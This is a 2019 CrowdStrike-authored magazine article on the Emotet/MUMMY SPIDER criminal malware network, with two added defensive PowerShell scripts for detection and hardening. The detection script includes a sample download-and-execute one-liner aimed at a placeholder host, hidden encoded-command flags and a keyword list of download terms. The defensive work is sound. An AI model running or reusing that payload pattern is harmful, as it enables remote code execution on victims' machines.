URL: https://www.information-age.com/ecrime-cyber-network-13708/
Caught in the spider's web: demystifying the eCrime cyber network

By Editor's Choice, 9 May 2019

One thing was clear in 2018: law enforcement efforts have not yet halted or deterred eCrime actors and their cybercrime campaigns. Throughout the year CrowdStrike observed the rise of 'Big Game Hunting' tactics being leveraged in pursuit of financial payoff, along with a range of criminal adversaries engaging in notably more aggressive intrusions.

eCrime was prominent in 2018. Adversaries operating within criminal networks were tracked conducting a range of operations, including crimeware distribution, banking Trojans, ransomware, point-of-sale compromises and targeted spear-phishing campaigns. One of the most concerning eCrime trends, however, was the solidification of a prominent eCrime 'ecosystem'. Much like nation-state actors, eCrime adversaries rarely work alone, and in 2018 the malware distribution group MUMMY SPIDER cemented new and existing relationships, confirming the reality of a serious ecosystem of cooperating adversaries.

MUMMY SPIDER now sits at the centre of a web of advanced eCrime adversaries whose expertise spans ransomware, point-of-sale malware and banking Trojans. Collaboration between these groups has only made the collective stronger, and to defeat them we need to understand the entire network. To untangle this web of e-criminals we need to find the driver of the network and understand its motivations and approach to attacks; that in turn shows what connects these actors together and, eventually, how to cut the head off the snake.
THE HEAD OF THE SERPENT: MUMMY SPIDER

MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. Since it first appeared in mid-2014 it has swiftly become a formidable adversary, developing increasingly aggressive forms of malware. It does not follow typical criminal behaviour patterns: it usually conducts attacks for a few months, goes underground for three to 12 months, and then returns with a new malware variant. In 2017 the adversary made a conscious shift away from operating a banking Trojan to running a crimeware downloader service, and in 2018 it made efforts to render its malware more resilient, and thus more attractive to potential 'customers'.

MUMMY SPIDER conducts regular waves of spam campaigns to spread Emotet, often using general invoicing and payroll themes. Following infection, Emotet uses geo-targeting to determine which payload to deliver to the victim machine. Over the summer of 2018, in addition to supporting the download of TinyLoader, TrickBot and ZeuS Panda, CrowdStrike Intelligence observed Emotet infections propagating MUMMY SPIDER's own SMB Spreader to machines in the US, Canada, Germany, the UK, Japan and Australia.

In 2018 MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web of pre-existing and new relationships with other adversaries. It continued supporting WIZARD SPIDER (a Russia-based threat group) through the latter half of the year, while adding geo-targeted distribution for BokBot (operated and developed by LUNAR SPIDER, an Eastern Europe-based banking malware group) and Gozi ISFB.
INDRIK SPIDER (a sophisticated eCrime group that has operated Dridex since June 2014) also continued its historic relationship with MUMMY SPIDER during 2018, although downloads of Dridex by Emotet remain rare. Other members of this established network include individual operators of malware such as Panda Zeus, Nymaim and Gootkit.

INTO THE TANGLED WEB: WHY MULTIPLE SPIDERS ARE WORSE THAN ONE

To illustrate why a network of e-criminals presents a greater challenge for the cyber-security industry, consider a recent example of MUMMY SPIDER activity. In November 2018 a significant phishing campaign was identified that was having widespread effects. Based on the sheer volume of victims, it turned out to be one of the largest Emotet campaigns a cyber-security firm has ever observed, and CrowdStrike attributed it with high confidence to MUMMY SPIDER. (CrowdStrike uses the 'SPIDER' naming convention to identify eCrime groups around the globe.)

The campaign consisted of a malicious macro-enabled Microsoft Word document sent as an email attachment. If the recipient opened the weaponised document and macros were enabled on the machine, which is all too common, the macro launched an obfuscated PowerShell command. That command retrieved an Emotet dropper from remote command-and-control (C2) infrastructure, which in turn downloaded Emotet itself as the first-stage implant. Once the host was infected, further malware was pulled down according to its geographic location, and that second-stage download is where the ecosystem came into play.
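The delivery chain just described (Office document, enabled macro, obfuscated or encoded PowerShell, remote download) leaves a distinctive trace in process-creation telemetry: an Office application as the parent of a script host, usually with an -EncodedCommand argument. The script below is an added example, not code from the article or from CrowdStrike. It triages constructed records that reuse the Sysmon Event ID 1 field names (ParentImage, Image, CommandLine); the records, the sample payload and the URL example.invalid are made up here, and the indicator terms are a starting list rather than a complete one.

```powershell
# Added example (not from the article or CrowdStrike): triage process-creation records
# for the Office -> encoded PowerShell -> remote download pattern described above.
# Records are constructed to mimic Sysmon Event ID 1; in production they would come
# from Get-WinEvent or a SIEM export.

# Constructed stand-in for the kind of one-liner a malicious macro launches.
$samplePayload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/e")'
$sampleEncoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($samplePayload))

$records = @(
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = "powershell.exe -nop -w hidden -enc $sampleEncoded"
    },
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -File C:\scripts\nightly-backup.ps1'
    },
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe /c echo test'
    }
)

$officeApps    = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$scriptHosts   = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'
$downloadTerms = 'DownloadString', 'DownloadFile', 'Invoke-Expression', 'IEX',
                 'WebClient', 'Invoke-WebRequest', 'FromBase64String'

function Decode-EncodedCommand {
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
    # the argument is Base64 of the UTF-16LE script text.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)\s-(e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]+)') {
        try   { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return $null }   # not valid Base64: leave the raw command line to the analyst
    }
    return $null
}

function Test-OfficeSpawnedScriptHost {
    param($Record)
    $parent = ($Record.ParentImage -split '[\\/]')[-1].ToLower()
    $child  = ($Record.Image       -split '[\\/]')[-1].ToLower()
    if ($parent -notin $officeApps -or $child -notin $scriptHosts) { return $null }

    $decoded  = Decode-EncodedCommand -CommandLine $Record.CommandLine
    $hits     = @($downloadTerms | Where-Object { $decoded -and $decoded -match [regex]::Escape($_) })
    # High: encoded command containing download/execute terms. Medium: encoded but no
    # known term (obfuscation further than this decoder goes). Low: Office spawned a
    # script host at all, which is still worth a look.
    $severity = if ($hits) { 'High' } elseif ($decoded) { 'Medium' } else { 'Low' }

    [pscustomobject]@{
        Severity   = $severity
        Parent     = $parent
        Child      = $child
        Indicators = $hits -join ','
        Decoded    = $decoded
    }
}

$records | ForEach-Object { Test-OfficeSpawnedScriptHost $_ } | Where-Object { $_ } | Format-List
```

On the constructed input the WINWORD record comes back High with DownloadString, IEX and WebClient as indicators and the decoded one-liner attached; the explorer-launched backup script is ignored because its parent is not an Office application; the EXCEL-to-cmd record is reported Low with nothing decoded. The decoder only handles the -EncodedCommand layer, which is why the Medium tier exists: a sample that is still unreadable after Base64 decoding should be escalated rather than discarded.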
Of the second-stage payloads in that campaign, TrickBot is attributed to the eCrime group WIZARD SPIDER and BokBot to LUNAR SPIDER. What intelligence tells us is that these groups cooperate with MUMMY SPIDER to gain access to Emotet's victims: MUMMY SPIDER breaks down the door, and a flurry of other groups scurries in behind it to carry out further criminal activity while the system remains compromised. Nor does the web stop at MUMMY SPIDER's immediate associates; the further connections of those groups matter too. INDRIK SPIDER, for instance, has known connections to TINY SPIDER and SKELETON SPIDER, both of which benefit from malware distributed by INDRIK SPIDER.

DON'T GET ENSNARED: AVOID FALLING INTO THE ECRIME WEB

Whilst the web of e-criminals may seem daunting, there are a range of best practices businesses can adopt to protect themselves against these layered attacks. If the first adversary cannot break through your barriers, its partners stay locked out as well:

• Develop a post-recovery strategy: recovery is not the last step in remediating a ransomware attack, as this campaign clearly illustrates. Organisations need to know how the adversary got in before they can be sure it has been successfully ejected.

• Build an incident plan: review and test that plan to make sure it is up to date and relevant to the threats your organisation faces. Running tabletop simulations improves reaction times, and having incident response retainers ensures you have relevant support.
• Upgrade operating systems: CrowdStrike constantly sees organisations compromised because they have not moved to supported operating systems or applied critical patches. The savings gained by stretching the life of an outdated system are not worth the risk. Bolstering the defences around such devices can provide some additional protection while the upgrade plan is carried out.

• Upgrade to PowerShell v5 and remove previous versions: logging in this version of PowerShell is robust enough that security teams can see the commands being executed, in real time, including the de-obfuscated content of script blocks. If companies update to v5 across the enterprise, their own security teams can see what is happening and respond right away. Removing earlier versions also prevents downgrade attacks, in which an attacker deliberately starts the old PowerShell 2.0 engine because it lacks this logging. The same principle applies to other applications on your network: security hygiene is key to improving how your network operates.

• Use multi-factor authentication (MFA) for all users, and privileged access management tools: make it as difficult as possible for adversaries outside your network to obtain and use both user and admin credentials. Once they hold those, they can do whatever they want in the environment. Beyond MFA, a more robust privileged access management process limits the damage adversaries can do if they get in.

There are many things that can be done to reduce the risk of intrusion, and employee programmes can also assist. If you do not have all the resources you need, consider working with a third party that offers services such as tabletop exercises, compromise assessments and incident response retainers, to demonstrate your maturity and hopefully reduce or prevent incidents in your environment.

Written by John Titmus, director EMEA at CrowdStrike
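The PowerShell recommendation in the list above (move to v5, turn its logging on, remove the old engine) translates into a handful of concrete settings. The script below is an added example, not from the article or from CrowdStrike, showing how an operator would apply and verify them on a single Windows host from an elevated Windows PowerShell 5.1 prompt (Windows 10 or Server 2016 and later). The registry paths are the documented policy-equivalent keys, and the feature and event names are Microsoft's own; nothing here is specific to Emotet.

```powershell
# Added example (not from the article or CrowdStrike): apply and verify the PowerShell
# hardening recommended above. Run elevated on Windows PowerShell 5.1.

# 1. Confirm the engine version: script block logging needs Windows PowerShell 5.x.
if ($PSVersionTable.PSVersion.Major -lt 5) {
    Write-Warning "PowerShell $($PSVersionTable.PSVersion) found; install WMF 5.1 before relying on the logging below."
}

# 2. Turn on script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational)
#    and module logging. 4104 records the de-obfuscated script text that actually ran,
#    which is what lets analysts see an encoded or obfuscated command for what it is.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$policy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Type DWord -Value 1
New-Item -Path "$policy\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$policy\ModuleLogging" -Name EnableModuleLogging -Type DWord -Value 1
New-ItemProperty -Path "$policy\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 3. Remove the PowerShell 2.0 engine. "powershell.exe -Version 2" otherwise runs under an
#    engine that has none of this logging, which is the downgrade the article warns about.
Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2*' |
    Where-Object State -eq 'Enabled' |
    ForEach-Object { Disable-WindowsOptionalFeature -Online -FeatureName $_.FeatureName -NoRestart | Out-Null }

# 4. Look back for downgrade attempts already in the logs: engine start events (ID 400 in the
#    classic "Windows PowerShell" log) whose details report EngineVersion=2.0.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
    Select-Object TimeCreated,
                  @{ Name = 'HostApplication'; Expression = { if ($_.Message -match 'HostApplication=(.+)') { $Matches[1].Trim() } } }
```

Steps 2 and 3 change the host and need administrative rights; step 4 only reads existing logs, so it is safe to run first as a hunt across a fleet before the 2.0 engine is removed. In a domain, set the ScriptBlockLogging and ModuleLogging values through Group Policy rather than writing the registry directly, so the setting is enforced and cannot be silently undone on individual machines.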